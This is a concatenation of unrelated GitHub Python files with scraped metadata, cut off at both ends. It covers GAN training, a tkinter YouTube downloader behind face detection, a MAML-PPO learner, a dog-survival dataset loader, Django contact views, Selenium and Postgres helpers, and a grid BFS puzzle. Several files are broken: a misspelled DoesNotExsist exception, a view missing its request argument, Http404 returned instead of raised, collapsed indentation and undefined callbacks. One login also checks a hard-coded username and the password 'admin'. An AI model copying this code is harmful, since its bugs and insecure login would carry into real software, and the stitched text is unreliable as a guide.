        ax[0][1].set_title(f'fake={porfake2:.4f}')
        #Losses (generator and critic)
        ax[0][2].plot(losses_gen, 'b',label='Generator', linewidth=2)
        ax[0][2].plot(losses_critic, 'darkorange',label='Critic', linewidth=2)
        ax[0][2].plot(losses_encoder, 'g',label='VAE', linewidth=2)
        ax[0][2].legend()
        ax[0][2].set_xlabel('Epochs')
        ax[0][2].set_ylabel('Loss')
        plt.savefig(f'./Rock/GenVAE_bentheimer_{epoch}.png')
    # save losses at each epoch
    # NOTE(review): batch_idx is the LAST index (num_batches - 1), not the batch
    # count — off-by-one in the averages and ZeroDivisionError with one batch.
    losses_gen.append(mean_loss_gen / (batch_idx * GENERATOR_ITERATIONS))
    losses_critic.append(mean_loss_critic / (batch_idx * CRITIC_ITERATIONS))
    losses_encoder.append(mean_loss_encoder / (batch_idx * GENERATOR_ITERATIONS))
    # Save checkpoints
    #Uncomment the following to save checkpoints while training
    if epoch % 5 == 0:
        save_checkpoint(gen, opt_gen, path=CHECKPOINT_GEN + f"generatorVAE_bentheimer_{epoch}.pt")
        save_checkpoint(critic, opt_critic, path=CHECKPOINT_CRITIC + f"critic_bentheimer_{epoch}.pt")
| pch-upc/reconstruction-cvaegan | train.py | train.py | py | 6,241 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.from_numpy",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "torch.from_numpy",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_n... |
7373341985 | import cv2
import numpy as np
from tkinter import *
import tkinter.font
from tkinter import messagebox
from tkinter import filedialog
from pytube import YouTube
from PIL import ImageTk,Image
from bs4 import BeautifulSoup
from datetime import date
from googlesearch import search
import csv
import time, vlc
import pandas as pd
import requests
import urllib3
import sqlite3
import webbrowser
import speech_recognition as sr
import browse
import src
import speech
import database
import photoapp
cap = cv2.VideoCapture(0)
while (cap.isOpened()):
ret,frame = cap.read()
if ret ==True:
face_cascade = cv2.CascadeClassifier("opencvTutorial-main/files/haarcascade_frontalface_default.xml")
gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray,1.3,5)
for (x,y,w,h) in faces:
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),3)
cv2.imshow('Frame',frame)
if len(faces) !=0:
print("face detected")
cap.release()
cv2.destroyAllWindows()
root1 = Tk()
Desired_font = tkinter.font.Font( family = "Comic Sans MS",
size = 13,
weight = "bold")
root1.title("Login")
frame2 = LabelFrame(root1,bg='white')
frame2.grid(row=3,column=1,columnspan=4)
user = Label(frame2,text = "Enter Username",fg='black',bg='white',font = Desired_font)
pswd = Label(frame2,fg='black',bg='white',text="Enter Password",font = Desired_font)
user.grid(row=1,column=1,columnspan=2)
pswd.grid(row=2,column=1,columnspan=2)
e1 = Entry(frame2,width=35,borderwidth=2,font = Desired_font)
e1.grid(row =1,column=3,columnspan = 2,ipady=3)
e2 = Entry(frame2,width=35,borderwidth=2,font = Desired_font)
e2.grid(row =2,column=3,columnspan = 2,ipady=3)
log_button = Button(frame2,text="Login",fg='black',bg='white',font = Desired_font,command = lambda:login(e1.get(),e2.get()))
log_button.grid(row=3,column = 2,columnspan=2,ipadx=15)
global my_label
def login(user,pswd):
    """Open the downloader window if the hard-coded credentials match.

    :param user: Username typed into the login form.
    :param pswd: Password typed into the login form.

    NOTE(review): the callbacks `backward`, `forward`, `Down` and `show` are
    not defined in this file — presumably provided by one of the imported
    helper modules; verify. `command=browse` passes the imported *module*
    object as the callback — confirm a `browse` callable was intended.
    """
    if user == "Akshay" and pswd == "admin":
        # root1.destroy()
        root = Toplevel(root1,bg='white')
        root.title("Welcome to Akshay_youloder")
        # Pre-load the slideshow images (kept in img_lst so Tk retains references)
        img1 = ImageTk.PhotoImage(Image.open("Downloads/yd_img2.png").resize((850, 450), Image.ANTIALIAS))
        img2 = ImageTk.PhotoImage(Image.open("Pictures/2.jpg").resize((850, 450), Image.ANTIALIAS))
        img3 = ImageTk.PhotoImage(Image.open("Pictures/3.jpg").resize((850, 450), Image.ANTIALIAS))
        img4 = ImageTk.PhotoImage(Image.open("Pictures/4.jpg").resize((850, 450), Image.ANTIALIAS))
        img5 = ImageTk.PhotoImage(Image.open("Pictures/5.jpg").resize((850, 450), Image.ANTIALIAS))
        img_lst = [img1,img2,img3,img4,img5]
        frame = LabelFrame(root,bg = 'white')
        frame.grid(row=1,column=2,columnspan=2)
        l3 = Label(root,text = "Enter Song name!!",bg='white',fg='black',font = Desired_font)
        l3.grid(row=1,column=0,columnspan=2)
        # my_label is global so prev/next callbacks can swap the displayed image
        global my_label
        my_label = Label(root,image=img1)
        my_label.grid(row=0,column=0,columnspan=4)
        prev = Button(frame,text="prev",fg='black',bg='white',borderwidth=2,padx=30,command =backward,font = Desired_font)
        nex = Button(frame,text="next",fg='black',bg='white',borderwidth=2,padx=30,command=forward,font = Desired_font)
        prev.grid(row=1,column=0)
        nex.grid(row=1,column=2)
        frame1 = LabelFrame(root,bg='white')
        frame1.grid(row=2,column=2)
        e = Entry(root,width=35,borderwidth=2,font = Desired_font)
        e.grid(row =2,column=0,columnspan = 2,ipady=3)
        D_button = Button(frame1,text="Download",fg='black',bg='white',font = Desired_font,command = lambda:Down(e.get()))
        D_button.grid(row=1,column = 2,columnspan=1,ipadx=15)
        Exit_button = Button(frame1,fg='black',bg='white',text="Exit",command=root.destroy,font = Desired_font)
        Exit_button.grid(row=1,column =3,columnspan=1,ipadx=15)
        sh_rec = Button(root,fg='black',bg='white',text="Show downloads",command = show,font = Desired_font)
        sh_rec.grid(row=2,column = 3,columnspan=1,ipadx=15)
        br = Button(root,text="Browse",command=browse,fg='black',bg='white',font = Desired_font)
        br.grid(row=3,column=3,columnspan=1,ipadx=15)
        mainloop()
if cv2.waitKey(1) & 0xFF == ord('$'):
break
else:
break
cap.release()
cv2.destroyAllWindows()
| 07akshay/YouLoader | __init__.py | __init__.py | py | 5,073 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "cv2.VideoCapture",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "cv2.CascadeClassifier",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "cv2.cvtColor",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2GRA... |
74542668264 | import time
import numpy as np
import tensorflow as tf
import os.path as osp
from baselines import logger
from collections import deque
from baselines.common import explained_variance, set_global_seeds
from baselines.common.models import get_network_builder
import random
try:
from mpi4py import MPI
except ImportError:
MPI = None
from baselines.ppo2.runner import Runner
def constfn(val):
    """Wrap a constant in a schedule-like callable that ignores its argument."""
    def schedule(_):
        return val
    return schedule
def learn(*, network, env, total_timesteps, tasks=None, task_names=None, eval_env = None, seed=None, nsteps=2048, ent_coef=0.0, lr=3e-4,
          vf_coef=0.5, max_grad_norm=0.5, gamma=0.99, lam=0.95, maml_beta=0.1, task_batch=3,
          log_interval=10, nminibatches=4, noptepochs=4, cliprange=0.2,
          save_interval=0, load_path=None, model_fn=None, **network_kwargs):
    '''
    Learn a policy with PPO (https://arxiv.org/abs/1707.06347), extended with a
    MAML-style meta-update across a set of tasks: each meta-step samples
    `task_batch` tasks, adapts the policy on each with inner PPO updates, and
    applies the averaged meta-gradient with an Adam optimizer (lr `maml_beta`).

    Parameters:
    ----------
    network: policy network architecture; either a string naming a standard
        architecture (mlp, lstm, lnlstm, cnn_lstm, cnn, cnn_small, conv_only -
        see baselines.common/models.py) or a callable building the network.
    env: vectorized environment (baselines.common.vec_env.VecEnv).
    total_timesteps: total number of environment timesteps to train for.
    tasks: list of per-task vectorized environments (one Runner is built per task).
    task_names: names paired with `tasks`, forwarded to the Runners.
    eval_env: optional environment used only for evaluation rollouts.
    seed: RNG seed forwarded to set_global_seeds.
    nsteps: steps per environment per update (batch is nsteps * nenvs).
    ent_coef / vf_coef: entropy and value-function loss coefficients.
    lr: inner-loop learning rate (float or schedule over remaining progress).
    max_grad_norm: gradient-norm clipping for the inner updates.
    gamma / lam: discount and GAE lambda.
    maml_beta: learning rate of the outer (meta) Adam optimizer.
    task_batch: number of tasks sampled per meta-update.
    log_interval: updates between logging events.
    nminibatches / noptepochs: inner PPO minibatch count and epochs.
    cliprange: PPO clipping range (float or schedule).
    save_interval: unused here (kept for interface compatibility).
    load_path: optional checkpoint directory to restore the model from.
    model_fn: optional model factory; defaults to baselines.ppo2.model.Model.
    **network_kwargs: forwarded to the network builder.
    :return: the trained model.
    '''
    set_global_seeds(seed)
    if isinstance(lr, float): lr = constfn(lr)
    else: assert callable(lr)
    if isinstance(cliprange, float): cliprange = constfn(cliprange)
    else: assert callable(cliprange)
    total_timesteps = int(total_timesteps)
    # Outer-loop (meta) optimizer
    optimizer = tf.keras.optimizers.Adam(learning_rate=maml_beta)
    # Get the nb of env
    nenvs = env.num_envs
    ntasks = len(tasks)
    # Get state_space and action_space
    ob_space = env.observation_space
    ac_space = env.action_space
    if isinstance(network, str):
        network_type = network
        policy_network_fn = get_network_builder(network_type)(**network_kwargs)
        network = policy_network_fn(ob_space.shape)
    # Calculate the batch_size
    nbatch = nenvs * nsteps
    nbatch_train = nbatch // nminibatches
    is_mpi_root = (MPI is None or MPI.COMM_WORLD.Get_rank() == 0)
    # Instantiate the model object (that creates act_model and train_model)
    if model_fn is None:
        from baselines.ppo2.model import Model
        model_fn = Model
    model = model_fn(ac_space=ac_space, policy_network=network, ent_coef=ent_coef, vf_coef=vf_coef,
                     max_grad_norm=max_grad_norm)
    if load_path is not None:
        load_path = osp.expanduser(load_path)
        ckpt = tf.train.Checkpoint(model=model)
        manager = tf.train.CheckpointManager(ckpt, load_path, max_to_keep=None)
        ckpt.restore(manager.latest_checkpoint)
    # Instantiate one runner per task (they share the single model)
    runners = [Runner(env=env, model=model, nsteps=nsteps, gamma=gamma, lam=lam, name=name) for env, name in zip(tasks, task_names)]
    if eval_env is not None:
        eval_runner = Runner(env = eval_env, model = model, nsteps = nsteps, gamma = gamma, lam= lam)
    epinfobuf = deque(maxlen=100)
    if eval_env is not None:
        eval_epinfobuf = deque(maxlen=100)
    # Start total timer
    tfirststart = time.perf_counter()
    total_episodes = 0
    nupdates = total_timesteps//nbatch//task_batch
    for update in range(1, nupdates+1):
        assert nbatch % nminibatches == 0
        # Start timer
        tstart = time.perf_counter()
        frac = 1.0 - (update - 1.0) / nupdates
        # Calculate the learning rate
        lrnow = lr(frac)
        cliprangenow = cliprange(frac)
        # Snapshot the pre-adaptation parameters so each task starts from them
        old_params = [tf.Variable(x) for x in model.trainable_variables]
        # randomly select tasks
        sampled_tasks = random.sample(range(ntasks), task_batch)
        meta_grads = []
        for i in sampled_tasks:
            runner = runners[i]
            if update % log_interval == 0 and is_mpi_root: logger.info('Stepping environment...')
            # Inner-loop adaptation recorded on a tape for the meta-gradient.
            # NOTE(review): the commented-out tapes below suggest the tape
            # placement was in flux — confirm the meta-loss computed after the
            # inner updates is actually differentiable w.r.t. the variables
            # this tape watches.
            with tf.GradientTape() as tape:
                obs, returns, masks, actions, values, neglogpacs, states, epinfos = runner.run() #pylint: disable=E0632
                if eval_env is not None:
                    eval_obs, eval_returns, eval_masks, eval_actions, eval_values, eval_neglogpacs, eval_states, eval_epinfos = eval_runner.run() #pylint: disable=E0632
                epinfobuf.extend(epinfos)
                if eval_env is not None:
                    eval_epinfobuf.extend(eval_epinfos)
                # Here what we're going to do is for each minibatch calculate the loss and append it.
                mblossvals = []
                # Index of each element of batch_size
                # Create the indices array
                inds = np.arange(nbatch)
                for _ in range(noptepochs):
                    np.random.shuffle(inds)
                    # 0 to batch_size with batch_train_size step
                    for start in range(0, nbatch, nbatch_train):
                        end = start + nbatch_train
                        mbinds = inds[start:end]
                        slices = (tf.constant(arr[mbinds]) for arr in (obs, returns, masks, actions, values, neglogpacs))
                        pg_loss, vf_loss, entropy, approxkl, clipfrac, loss = model.train(lrnow, cliprangenow, *slices)
                        mblossvals.append([pg_loss, vf_loss, entropy, approxkl, clipfrac])
                # collect some new trajectories with the updated policy but don't update policy
                if update % log_interval == 0 and is_mpi_root: logger.info('Stepping environment with new policy...')
                obs, returns, masks, actions, values, neglogpacs, states, epinfos = runner.run() #pylint: disable=E0632
                # with tf.GradientTape() as tape:
                losses = []
                # with tf.GradientTape() as tape:
                inds = np.arange(nbatch)
                for _ in range(1):
                    # Randomize the indexes
                    np.random.shuffle(inds)
                    for start in range(0, nbatch, nbatch_train):
                        end = start + nbatch_train
                        mbinds = inds[start:end]
                        slices = (tf.constant(arr[mbinds]) for arr in (obs, returns, masks, actions, values, neglogpacs))
                        losses.append(model.get_loss(cliprangenow, *slices))
            # Meta-loss for this task, then restore the pre-adaptation weights
            meta_loss = tf.reduce_mean(losses)
            meta_grads.append(tape.gradient(meta_loss, model.trainable_variables))
            set_weights(model, old_params)
        # Outer update: average the per-task meta-gradients, clip, and apply
        lossvals = np.mean(mblossvals, axis=0)
        meta_grad = mean(meta_grads)
        meta_grad, _ = tf.clip_by_global_norm(meta_grad, 0.5)
        # meta_grad = tape.gradient(meta_loss, model.trainable_variables)
        grads_and_vars = zip(meta_grad, model.trainable_variables)
        optimizer.apply_gradients(grads_and_vars)
        # End timer
        tnow = time.perf_counter()
        # Calculate the fps (frame per second)
        fps = int(nbatch * task_batch / (tnow - tstart))
        if update % log_interval == 0 or update == 1:
            # Calculates if value function is a good predicator of the returns (ev > 1)
            # or if it's just worse than predicting nothing (ev =< 0)
            total_rews = 0
            episodes = 0
            recent_eps = 0
            ev = explained_variance(values, returns)
            logger.logkv("misc/serial_timesteps", update*nsteps)
            logger.logkv("misc/nupdates", update)
            logger.logkv("misc/total_timesteps", update*nbatch*task_batch)
            logger.logkv("fps", fps)
            logger.logkv("misc/explained_variance", float(ev))
            logger.logkv('eprewmean', safemean([epinfo['r'] for epinfo in epinfobuf]))
            logger.logkv('eplenmean', safemean([epinfo['l'] for epinfo in epinfobuf]))
            # NOTE(review): `episodes` re-counts ALL episodes so far each time we
            # log, so `total_episodes` accumulates duplicates — confirm intended.
            for i in range(ntasks):
                episodes += len(runners[i].eprew)
                recent_rews = runners[i].eprew[-100:]
                recent_eps += len(recent_rews)
                total_rews += sum(recent_rews)
            total_episodes += episodes
            logger.logkv('total_episodes', total_episodes) # Total of all episodes thus far
            logger.logkv('mean_ep_rewards', safediv(total_rews, recent_eps)) # Running average reward of last 100 episodes for the sampled tasks
            logger.logkv('total_episodes_per_game', total_episodes/ntasks) # Mean reward of last 100 episodes
            if len(runner.eprew):
                logger.logkv('last_ep_rewards', runner.eprew[-1])
            else:
                logger.logkv('lasteprew', None)
            if eval_env is not None:
                logger.logkv('eval_eprewmean', safemean([epinfo['r'] for epinfo in eval_epinfobuf]) )
                logger.logkv('eval_eplenmean', safemean([epinfo['l'] for epinfo in eval_epinfobuf]) )
            logger.logkv('misc/time_elapsed', tnow - tfirststart)
            for (lossval, lossname) in zip(lossvals, model.loss_names):
                logger.logkv('loss/' + lossname, lossval)
            logger.dumpkvs()
    return model
# Avoid division error when calculate the mean (in our case if epinfo is empty returns np.nan, not return an error)
def safemean(xs):
    """Mean of *xs*, or NaN for an empty sequence (avoids np.mean's warning)."""
    if len(xs) == 0:
        return np.nan
    return np.mean(xs)
def safediv(xs, denom):
    """Divide *xs* by *denom*, returning NaN instead of raising on zero."""
    if denom == 0:
        return np.nan
    return xs / denom
def mean(var_list):
    """Element-wise average across parallel tensor lists (e.g. per-task gradients)."""
    return [tf.reduce_mean(group, axis=0) for group in zip(*var_list)]
def add_vars(var_list):
    """Element-wise sum across parallel tensor lists."""
    return [tf.reduce_sum(group, axis=0) for group in zip(*var_list)]
def set_weights(model, var_list):
    """Copy the values in *var_list* into the model's trainable variables, in order."""
    for new_value, variable in zip(var_list, model.trainable_variables):
        variable.assign(new_value)
def copy_params(model):
    """Snapshot the model's trainable variables as fresh tf.Variable copies."""
    snapshot = []
    for variable in model.trainable_variables:
        snapshot.append(tf.Variable(variable))
    return snapshot
{
"api_name": "mpi4py.MPI",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "baselines.common.set_global_seeds",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras.optimizers.Adam",
"line_number": 88,
"usage_type": "call"
},
{
"api... |
74532513383 | import time
import pandas as pd
import numpy as np
from os.path import dirname
from . import converters;
from sklearn.datasets.base import Bunch
#Load dataframe
def load_df_dogs_2016(NApolicy='none', dropColumns=[], fixErrors=True, fixAge=True, censoringPolicy='none', newFeats=True):
    """Load the 2006-2016 dogs spreadsheet as a cleaned pandas DataFrame.

    Bug fixes vs. the previous version:
    - ``pd.read_excel`` selects a sheet via ``sheet_name``; the old
      ``spreadsheet=`` keyword is not a pandas parameter and made the call fail.
    - The deprecated ``np.str`` / ``np.int`` / ``np.float`` aliases (removed in
      NumPy >= 1.24) are replaced by the equivalent builtins (same dtypes).

    :param NApolicy: missing-value handling: 'none' (keep), 'drop' (drop rows
        with any NA), 'mean' (fill with column means) or 'normal' (fill with
        draws from a per-column normal distribution).
    :param dropColumns: column names to remove (read-only; never mutated here).
    :param fixErrors: recompute "Survival time" where it disagrees with
        "Date of death" - "First visit".
    :param fixAge: recompute "Age" as ("First visit" - "Birth date") / 365.
    :param censoringPolicy: 'none', 'drop' (remove censored subjects) or 'max'
        (assign censored subjects the max observed survival time).
    :param newFeats: add "Therapy to visit" (days from therapy start to visit).
    :return: the processed DataFrame.
    """
    module_path = dirname(__file__)
    data = pd.read_excel(module_path + "/data/dogs.xlsx",
                         sheet_name="2006-2016",
                         converters={"IP": converters.sieno_converter,
                                     "Furosemide": converters.sieno_converter,
                                     "Ache-i": converters.sieno_converter,
                                     "Pimobendan": converters.sieno_converter,
                                     "Spironolattone": converters.sieno_converter,
                                     "Antiaritmico": converters.sieno_converter,
                                     },
                         dtype={"Cartella": str,
                                "Gravità IP": int,
                                "Vrig Tric": float,
                                "Età": float,
                                "MORTE": float,
                                "MC": float,
                                "Data di nascita": str,
                                "Data 1° visita": str,
                                "Inizio Terapia": str,
                                "Data morte ": str,
                                "SURVIVAL TIME": int,
                                "Terapia": int,
                                "isachc": str,
                                "CLASSE": str,
                                "Peso (Kg)": float,
                                "Asx/Ao": float,
                                "E": float,
                                "E/A": float,
                                "FE %": float,
                                "FS%": float,
                                "EDVI": float,
                                "ESVI": float,
                                "Allo diast": float,
                                "Allo sist": float
                                }
                         )
    # Translate the Italian column names used downstream.
    data.rename(columns={"Cartella": "Folder",
                         "Gravità IP": "IP Gravity",
                         "Data di nascita": "Birth date",
                         "Data 1° visita": "First visit",
                         "Età": "Age",
                         "Inizio Terapia": "Therapy started",
                         "MORTE": "Dead",
                         "Data morte ": "Date of death",
                         "SURVIVAL TIME": "Survival time",
                         "Terapia": "Therapy Category",
                         "CLASSE": "Class",
                         "Peso (Kg)": "Weight (Kg)",
                         "FS%": "FS %"
                         }, inplace=True)
    timeCols = ["Birth date", "First visit", "Therapy started", "Date of death"]
    # Use the same date format for every date column.
    for attr in timeCols:
        data[attr] = data[attr].apply(lambda x: converters.date_converter(x))
    if fixErrors:
        # Recompute survival time wherever it disagrees with the recorded dates.
        for i, row in data.iterrows():
            actual_days = (row["Date of death"] - row["First visit"]).days
            if actual_days != row["Survival time"]:
                data.at[i, "Survival time"] = actual_days
    if newFeats:
        # Adding new column "Therapy to visit", a time delta in days
        data["Therapy to visit"] = (data["First visit"] - data["Therapy started"]).apply(lambda x: x.days)
    if fixAge:
        # Fixing Age attribute to be consistently equal to "First visit" - "Birth date"
        data["Age"] = (data["First visit"] - data["Birth date"]).apply(lambda x: x.days/365)
    # Convert dates to POSIX timestamps so the frame is fully numeric.
    for attr in timeCols:
        data[attr] = data[attr].apply(lambda x: time.mktime(x.timetuple()))
    # Censoring policies
    if censoringPolicy == 'drop':
        # Drop censored (still alive) subjects entirely.
        data.drop(data[data["Dead"] == 0].index, inplace=True)
    elif censoringPolicy == 'max':
        # Substitute survival time with the max survival time of dead subjects.
        survmax = data["Survival time"][data["Dead"] == 1].max()
        for i, row in data.iterrows():
            if row["Dead"] == 0:
                data.at[i, "Survival time"] = survmax
    # Delete unwanted columns
    data.drop(dropColumns, axis="columns", inplace=True)
    # NA policies
    if NApolicy == 'drop':
        data.dropna(axis=0, how='any', inplace=True)
    elif NApolicy == 'mean':
        # Fill NA with the mean value of each affected column.
        means = {nacol: data[nacol].mean() for nacol in data.columns[data.isnull().any()].tolist()}
        data.fillna(value=means, inplace=True)
    elif NApolicy == 'normal':
        # Fill NA with values drawn from each column's fitted normal distribution.
        params = {nacol: (data[nacol].mean(), data[nacol].std()) for nacol in data.columns[data.isnull().any()].tolist()}
        for i, row in data.iterrows():
            for nacol in params.keys():
                if pd.isnull(row[nacol]):
                    data.at[i, nacol] = np.random.normal(loc=params[nacol][0], scale=params[nacol][1])
    return data
#default drop columns
dropNonNumeric = ["Folder", "isachc", "Class"]
dropIrrelevant = ["IP", "Furosemide", "Ache-i", "Pimobendan", "Spironolattone"]
dropDead = ["Dead", "MC"]
dropDates = ["Birth date", "First visit", "Therapy started", "Date of death"]
#load sklearn Bunch object with Survival time as target
def load_skl_dogs_2016(NApolicy='drop', dropColumns=dropNonNumeric+dropIrrelevant+dropDead+dropDates, censoringPolicy='none', newFeats=True, scaler=None, outlier_detector=None, censSVR=False):
# If the results will have to be trated with a censored SVR, don't drop "Dead" column
dropCols = dropColumns
if censSVR:
if "Dead" in dropCols:
dropCols.remove("Dead")
data = load_df_dogs_2016(NApolicy = NApolicy, dropColumns = dropCols, censoringPolicy=censoringPolicy, newFeats=newFeats)
if outlier_detector is not None:
y_outliers = outlier_detector.fit_predict(data.as_matrix())
data["Outlier"] = pd.Series(y_outliers)
data.drop(data[data["Outlier"]<1].index, inplace=True)
data.drop("Outlier", axis="columns", inplace=True)
#Target column
targetArray = data.loc[:, "Survival time"].as_matrix()
data.drop("Survival time", axis="columns", inplace=True)
#If censSVR, make sure the "Dead" column is the last of the data matrix
if censSVR:
cols = list(data.columns)
cols.remove("Dead")
cols.append("Dead")
data = data[cols]
featureNames = list(data.columns)
dataMatrix = data.as_matrix()
if scaler is not None:
dataMatrix = scaler.fit_transform(dataMatrix)
return Bunch(feature_names = featureNames, data = dataMatrix, target = targetArray)
| elvisnava/svm-thesis | experiments/datasets/dogs_2006_2016.py | dogs_2006_2016.py | py | 6,959 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.dirname",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "pandas.read_excel",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "numpy.str",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "numpy.int",
"lin... |
7409463239 | from django.http import Http404
from django.shortcuts import render, redirect
from django.db import IntegrityError
from contact_manager.models import Contact, Country
from contact_manager.forms import CountryModelForm
def c_form(request):
if request.method == 'GET':
template = 'contact.html'
x = Contact.objects.all()
print(x)
data = {'contact_list': x}
return render(request, template, data)
elif request.method == 'POST':
name = request.POST['name']
mobile = request.POST['mobile']
email = request.POST['email']
if len(name) > 3 and 10 <= len(mobile):
x = Contact(name=name, mobile=mobile, email=email)
x.save()
return redirect('c_home')
else:
return Http404("Error: Invalid Entry")
def c_form_edit(request, contact_id):
try:
x = Contact.objects.get(id=contact_id)
except Contact.DoesNotExsist:
return redirect('c_form')
else:
if request.method == 'GET':
template = 'contact.html'
x = Contact.objects.get(id=contact_id)
data = {'contact_list': Contact.objects.order_by('name'), 'edit_data': x}
return render(request, template, data)
elif request.method == 'POST':
x = Contact.objects.get(id=contact_id)
x.name = request.POST['name']
x.mobile = request.POST['mobile']
x.email = request.POST['email']
x.save()
return redirect('c_home')
def c_form_delete(contact_id):
try:
x = Contact.objects.get(id=contact_id)
except Contact.DoesNotExsist:
return redirect('c_home')
else:
x.delete()
return redirect('c_form')
def c_forms_form(request):
if request.method == 'GET':
template = 'country_form.html'
data = {'form': CountryModelForm, 'country_list': Country.objects.all()}
return render(request, template, data)
elif request.method == 'POST':
form = CountryModelForm(request.POST)
if form.is_valid():
fx = form.cleaned_data
x = Country(
name=fx['name'],
capital=fx['capital'],
population=fx['population'],
sea=fx['sea'],
currency=fx['currency'],
)
try:
x.save()
except IntegrityError:
return Http404("Integrity Error")
else:
return redirect('c_home')
else:
template = 'country_form.html'
data = {'form': CountryModelForm(), 'country_list': Country.objects.all()}
return render(request, template, data)
| SRI-VISHVA/Django_Basic | django1/contact_manager/views.py | views.py | py | 2,829 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "contact_manager.models.Contact.objects.all",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "contact_manager.models.Contact.objects",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "contact_manager.models.Contact",
"line_number": 12,
... |
86452313478 | import algorithm
import pandas as pd
from pymongo import MongoClient
import pymongo
client = MongoClient('localhost', 27017)
db = client['tushare']
data = db.history_data.find({'code':'600446'}).sort([("date", pymongo.ASCENDING)])
df = pd.DataFrame(list(data))
prices = df['close'].values
print(prices[-1])
sma5 = algorithm.sma(prices,5)
sma5.reverse()
print(sma5)
diff, dea, cd = algorithm.macd(prices)
diff.reverse()
print(diff)
| justquant/dataimport | test.py | test.py | py | 463 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "pymongo.MongoClient",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "pymongo.ASCENDING",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "pandas.DataFrame",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "algorithm.s... |
14065733809 | from itertools import combinations
from collections import deque
N, M = map(int, input().split())
room = []
vir_l = []
for n in range(N):
room.append(list(map(int, input().split())))
for m in range(N):
if room[n][m] == 2:
vir_l.append((n,m))
d_v = [(-1,-1), (-1,0), (-1,1), (0,-1), (0,1), (1,-1), (1,0), (1,1)]
around_n = []
for x, y in vir_l:
around = 0
for direction in d_v:
nx = x + direction[0]
ny = y + direction[1]
if nx in range(N) and ny in range(N) and (room[nx][ny] == 0 or room[nx][ny] == 2):
around += 1
around_n.append((around,x,y))
around_n = sorted(around_n, key=lambda x : x[0], reverse = True)
com = []
for ar in around_n:
com.append((ar[1],ar[2]))
if len(com) == 10:
break
active_combi = combinations(com, M)
d=[(0, 1), (0, -1), (1, 0), (-1, 0)]
def bfs():
visited = []
while vir_queue:
x, y, sec = vir_queue.popleft()
visited.append((x,y))
for k in range(4):
nx = x + d[k][0]
ny = y + d[k][1]
if (nx,ny) not in visited and nx in range(N) and ny in range(N) and (room1[nx][ny] == 0 or room1[nx][ny] == 2):
room1[nx][ny] = sec + 1
vir_queue.append((nx, ny, sec + 1))
return sec
min_time = N*N
for combi in active_combi:
room1 = [row[:] for row in room]
cnt_zero = 0
for row in room1:
cnt_zero += row.count(0)
if cnt_zero == 0:
min_time = 0
break
vir_queue =deque()
for point in combi:
x, y = point
vir_queue.append((x,y,0))
room1[x][y] = 0
time = bfs()
cnt_zero = 0
for row in room1:
cnt_zero += row.count(0)
if cnt_zero == M and time < min_time:
min_time = time
if min_time == N*N:
print(-1)
else:
print(min_time) | yeon-june/BaekJoon | 17142_plus.py | 17142_plus.py | py | 1,863 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "itertools.combinations",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "collections.deque",
"line_number": 61,
"usage_type": "call"
}
] |
14841863301 | class CRM_loggin:
def loggin(self,username,pwd):
##CRM系系统打开url及登录
from selenium import webdriver
import time
driver = webdriver.Chrome()
driver.maximize_window()
self.driver = driver
self.driver.get('http://localhost:8080/crm/')
self.driver.find_element_by_name('userNum').send_keys(username)
self.driver.find_element_by_name('userPw').send_keys(pwd)
self.driver.find_element_by_id('in1').click()
def change_frame1(self,framename,num):
#跳转到指定frame
self.driver.switch_to.default_content()
self.driver.switch_to.frame(self.driver.find_elements_by_tag_name(framename)[num])
| crushrmsl/crush | crmTestSuite2/public/crmlogin.py | crmlogin.py | py | 713 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "selenium.webdriver.Chrome",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 6,
"usage_type": "name"
}
] |
71778088424 | import psycopg2
import pandas as pd
from sqlalchemy import create_engine
from Services.ConfigParser import ConfigParser
class Postgres:
def __init__(self):
config = ConfigParser()
db_config = config.DbConfigSettings()
self.connection_string = "postgresql://" + db_config["username"] + ":" + db_config["password"] + "@" + db_config["host"] + "/" + db_config["databaseName"]
def LoadFromDataFrame(self, data, tableName, boolReplace):
if (boolReplace):
exists = 'replace'
else:
exists = 'append'
db = create_engine(self.connection_string)
conn = db.connect()
df = pd.DataFrame(data)
df.to_sql(tableName, con=conn, if_exists=exists, index=False)
conn = psycopg2.connect(self.connection_string)
conn.autocommit = True
conn.close()
def GetData(self, query):
conn = psycopg2.connect(self.connection_string)
cur = conn.cursor()
cur.execute(query)
records = cur.fetchall()
conn.commit()
conn.close()
return records
| rohitdureja80/youtube-analytics | Database/Postgres.py | Postgres.py | py | 1,120 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "Services.ConfigParser.ConfigParser",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.create_engine",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 19,
"usage_type": "call"
},
{
"api_n... |
13102044092 | import time
import json
import requests
from tqdm import tqdm
from datetime import datetime, timezone
from . import logger
from pleroma_bot.i18n import _
# from pleroma_bot._utils import spinner
def twitter_api_request(self, method, url,
params=None, data=None, headers=None, cookies=None,
files=None, auth=None, timeout=None, proxies=None,
hooks=None, allow_redirects=True, stream=None,
